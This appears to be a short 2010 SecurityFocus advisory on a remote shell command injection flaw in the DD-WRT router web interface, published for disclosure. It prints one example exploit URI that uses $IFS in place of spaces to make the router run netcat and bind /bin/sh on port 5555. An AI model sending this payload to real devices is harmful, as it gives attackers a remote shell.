DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability

To exploit these issues, attackers may use a browser or readily available network utilities.

The following example URI is available:

http://www.example.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


The following exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus